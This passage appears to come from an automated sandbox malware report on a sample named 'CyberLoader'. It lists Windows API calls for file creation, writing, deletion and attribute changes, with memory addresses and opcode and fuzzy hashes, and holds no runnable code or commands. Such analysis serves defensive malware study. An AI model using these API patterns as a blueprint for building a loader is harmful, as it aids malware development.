                                                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0027CC94,00000001,?,?,?,00000000,00284ECD,?,?,?), ref: 00279F4C
                                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00284ECD,?,?,?,?,?,00284972,?), ref: 00279F8E
                                                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0027CC94,00000001,?,?), ref: 00279FB8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$Handle
                                                  • String ID:
                                                  • API String ID: 4209713984-0
                                                  • Opcode ID: 4f83e4effc53155d1a8f52a20d6091c1a5483489ad08b615fc1a61987d4f9904
                                                  • Instruction ID: 496284117fa2f52177de0a85db00b4932ee17fe3020542182ff37b048c5026af
                                                  • Opcode Fuzzy Hash: 4f83e4effc53155d1a8f52a20d6091c1a5483489ad08b615fc1a61987d4f9904
                                                  • Instruction Fuzzy Hash: 7A3107312183169BDF248F14DC4876ABBA8EB81710F04891DF849DB581CB71DD98CBB3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A22E
                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A261
                                                  • GetLastError.KERNEL32(?,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A27E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2485089472-0
                                                  • Opcode ID: 263918c5a65d776bac9067d9366d62e159734b496e03343bad7ff36d15c24769
                                                  • Instruction ID: cf19dda1ad3e4375a0865476abf41c2cde9a68df6c8d2db1cb15380bca654bd6
                                                  • Opcode Fuzzy Hash: 263918c5a65d776bac9067d9366d62e159734b496e03343bad7ff36d15c24769
                                                  • Instruction Fuzzy Hash: 8601D231170216A6DB32AF745C09BED3348AF47761F04C451FD0DE5092CB72CAA08AA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0029B019
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID:
                                                  • API String ID: 1807457897-3916222277
                                                  • Opcode ID: ba07fdb6e3c19475fccd43e50b7741ca818c5ccbd28ed3178493cacff999fc9a
                                                  • Instruction ID: bdb4c54b5a097cef2f27b977b94ac312902098f9376c54536c2d36066085ae0d
                                                  • Opcode Fuzzy Hash: ba07fdb6e3c19475fccd43e50b7741ca818c5ccbd28ed3178493cacff999fc9a
                                                  • Instruction Fuzzy Hash: 7C4135B051438C9BDF228E249D94BFBBBA9EB45704F1404ECE59E87142D335AA65CF20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0029A79D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: String
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2568140703-3893581201
                                                  • Opcode ID: b6de7351cea88fa307315c5335a3a347167d15ea997e6e5cc7a4068e899668c5
                                                  • Instruction ID: 9801af465c51652b72932d808438717bf1277cc9aeb2c55fe9f96ad03b44e019
                                                  • Opcode Fuzzy Hash: b6de7351cea88fa307315c5335a3a347167d15ea997e6e5cc7a4068e899668c5
                                                  • Instruction Fuzzy Hash: 4101E53255520DFBCF02AFA4DC06DEE7F66EF09750F064154FE1425160CA728931EB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00299D2F), ref: 0029A715
                                                  Strings
                                                  • InitializeCriticalSectionEx, xrefs: 0029A6E5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpin
                                                  • String ID: InitializeCriticalSectionEx
                                                  • API String ID: 2593887523-3084827643
                                                  • Opcode ID: 8d5c500c40c52aae79ab31225adbb233feec56d518ef73a5320f6a6ce8697710
                                                  • Instruction ID: d007d8c800324904879e1606a84b34e6a501109b32ae95afd603e7d882efee5c
                                                  • Opcode Fuzzy Hash: 8d5c500c40c52aae79ab31225adbb233feec56d518ef73a5320f6a6ce8697710
                                                  • Instruction Fuzzy Hash: B9F09A31665218BBCF01AF60DC0ACAEBF65EF06B60B018054FC091A260DE718E20AB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Alloc
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2773662609-671089009
                                                  • Opcode ID: bf7f8e4a30168238945f23c2b97252bde282e8bd153b51735179cdf512df0087
                                                  • Instruction ID: 8630fd00f918a86f7941d35c9f8dc699d49559d02204570cc299a417a1aaa9b4
                                                  • Opcode Fuzzy Hash: bf7f8e4a30168238945f23c2b97252bde282e8bd153b51735179cdf512df0087
                                                  • Instruction Fuzzy Hash: 94E05570B663286B8A10AF60AC0A9AEBB54CF57B10B424099FC0517240CEB04E219ADA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 002932AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2742660187-671089009
                                                  • Opcode ID: feecd7543a9bb92813d5a9184ac546b7dd716349ea37e4c4a09984709c3b5447
                                                  • Instruction ID: 31d90c0f7942d3074e57a4669c216afaaf0fd6547cf93bc4fc3093a5a87435b2
                                                  • Opcode Fuzzy Hash: feecd7543a9bb92813d5a9184ac546b7dd716349ea37e4c4a09984709c3b5447
                                                  • Instruction Fuzzy Hash: 8BD02B22B917346BC91036D06C039AF7E088703FF1F450152FE0C1A1838CA549300AC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E20B
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID: 3To
                                                  • API String ID: 1269201914-245939750
                                                  • Opcode ID: 3027b617a06441ccced1244281dda020233af806d48775e33aa60b66854909a6
                                                  • Instruction ID: d3138c6385dfbad4b398c0bb27df454ebc13fb87c9fcdea174963473dd9b6099
                                                  • Opcode Fuzzy Hash: 3027b617a06441ccced1244281dda020233af806d48775e33aa60b66854909a6
                                                  • Instruction Fuzzy Hash: 37B012A927F001BD320C31017F06C36032CC4E2B52330801FF605D40C5D9804C3D9532
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0029AF1B: GetOEMCP.KERNEL32(00000000,?,?,0029B1A5,?), ref: 0029AF46
                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0029B1EA,?,00000000), ref: 0029B3C4
                                                  • GetCPInfo.KERNEL32(00000000,0029B1EA,?,?,?,0029B1EA,?,00000000), ref: 0029B3D7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CodeInfoPageValid
                                                  • String ID:
                                                  • API String ID: 546120528-0
                                                  • Opcode ID: 50c4b2e1b2f0e31635c122606e31c16edcd3ae0bcbdd3de411ce4349599fcf36
                                                  • Instruction ID: 7d8c006be36c2262c2650a39d0fb9b16fcdb4ceedf7b0f0646ea4f7d0593b5d8
                                                  • Opcode Fuzzy Hash: 50c4b2e1b2f0e31635c122606e31c16edcd3ae0bcbdd3de411ce4349599fcf36
                                                  • Instruction Fuzzy Hash: 87517770D203069FDF22CF31E9A06BABBE4EF41300F18806ED0968B253D7359952EB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00276057: __EH_prolog.LIBCMT ref: 0027605C
                                                    • Part of subcall function 0027C827: __EH_prolog.LIBCMT ref: 0027C82C
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C86F
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C893
                                                  • new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: dea6b790ca78f783ffbe4592c5a9ff67dba45ac91aa0536aaff094ddf7cc9257
                                                  • Instruction ID: 509eaaca7d769c48b1d6bdcc6a62650ec39d9e1282bd908238c0b42098d9e48c
                                                  • Opcode Fuzzy Hash: dea6b790ca78f783ffbe4592c5a9ff67dba45ac91aa0536aaff094ddf7cc9257
                                                  • Instruction Fuzzy Hash: 964102B0815B409EE724DF7984859E6FBE5FF18300F508A6ED6EE83282DB726564CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00276057: __EH_prolog.LIBCMT ref: 0027605C
                                                    • Part of subcall function 0027C827: __EH_prolog.LIBCMT ref: 0027C82C
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C86F
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C893
                                                  • new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 5aa319418334bdca51346d10695ff9eca1dda22ecf1326091910ecac6c7ce70f
                                                  • Instruction ID: 75cb8c1d5be98c3c42be3019ee3bef61ec9bbc8a9a9ce71b32f289a8b3828724
                                                  • Opcode Fuzzy Hash: 5aa319418334bdca51346d10695ff9eca1dda22ecf1326091910ecac6c7ce70f
                                                  • Instruction Fuzzy Hash: 2B4114B0815B409EE724DF7984859E7FBE5FF18310F504A6ED6EE83282DB326564CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00279EDC,?,?,00277867), ref: 002797A6
                                                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00279EDC,?,?,00277867), ref: 002797DB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: fb78790e47114b63bf1cd2a097d317cd517db2ecc19121810345b323bf470c15
                                                  • Instruction ID: c45e362b1e3bb94dfa600e0dc35f4b1ffe77cbf39d0f4c90f706627bf4019a38
                                                  • Opcode Fuzzy Hash: fb78790e47114b63bf1cd2a097d317cd517db2ecc19121810345b323bf470c15
                                                  • Instruction Fuzzy Hash: 362128B0420745AFD7348F64CC86BA7B7E8EB49764F00891DF1D9821D1C374AC948B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00277547,?,?,?,?), ref: 00279D7C
                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E2C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$BuffersFlushTime
                                                  • String ID:
                                                  • API String ID: 1392018926-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0029A4B8
                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0029A4C5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                  • String ID:
                                                  • API String ID: 2279764990-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00279B35,?,?,00000000,?,?,00278D9C,?), ref: 00279BC0
                                                  • GetLastError.KERNEL32 ref: 00279BCD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00279E76
                                                  • GetLastError.KERNEL32 ref: 00279E82
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00298627
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,002B0F50,0027CE57,?,?,?,?,?,?), ref: 00298663
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocAllocate_free
                                                  • String ID:
                                                  • API String ID: 2447670028-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 00280915
                                                  • GetProcessAffinityMask.KERNEL32 ref: 0028091C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Process$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1231390398-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0029B610: GetEnvironmentStringsW.KERNEL32 ref: 0029B619
                                                    • Part of subcall function 0029B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029B63C
                                                    • Part of subcall function 0029B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029B662
                                                    • Part of subcall function 0029B610: _free.LIBCMT ref: 0029B675
                                                    • Part of subcall function 0029B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029B684
                                                  • _free.LIBCMT ref: 002979FD
                                                  • _free.LIBCMT ref: 00297A04
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                  • String ID:
                                                  • API String ID: 400815659-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A458
                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A489
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText_swprintf
                                                  • String ID:
                                                  • API String ID: 3011073432-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,?,0027984C,?,?,00279688,?,?,?,?,002A1FA1,000000FF), ref: 0027A13E
                                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0027984C,?,?,00279688,?,?,?,?,002A1FA1,000000FF), ref: 0027A16C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
